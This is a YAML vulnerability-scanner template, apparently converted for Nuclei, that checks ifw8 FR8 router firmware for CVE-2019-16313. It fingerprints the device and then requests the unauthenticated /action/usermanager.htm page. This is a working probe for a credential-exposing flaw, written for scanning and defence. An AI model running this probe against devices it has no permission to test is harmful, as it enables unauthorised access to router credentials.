id: yaml-poc-ifw8-fr8_firmware-unsafe_config-CVE-2019-16313
info:
  name: Yaml Poc Ifw8 Fr8_Firmware Unsafe_Config Cve 2019 16313
  author: converted
  severity: high
  description: 'Converted from xpoc: yaml-poc-ifw8-fr8_firmware-unsafe_config-CVE-2019-16313'
  tags: cve
  classification:
    cve-id: CVE-2019-16313
  reference:
  - http://www.iwantacve.cn/index.php/archives/311/
  - https://nvd.nist.gov/vuln/detail/CVE-2019-16313
http:
- method: GET
  path:
  - /index.htm?PAGE=web
  redirects: false
  matchers-condition: and
  matchers:
  - type: status
    status:
    - 200
  - type: word
    part: body
    words:
    - www.ifw8.cn
- method: GET
  path:
  - /action/usermanager.htm
  redirects: false
  matchers-condition: and
  matchers:
  - type: status
    status:
    - 200
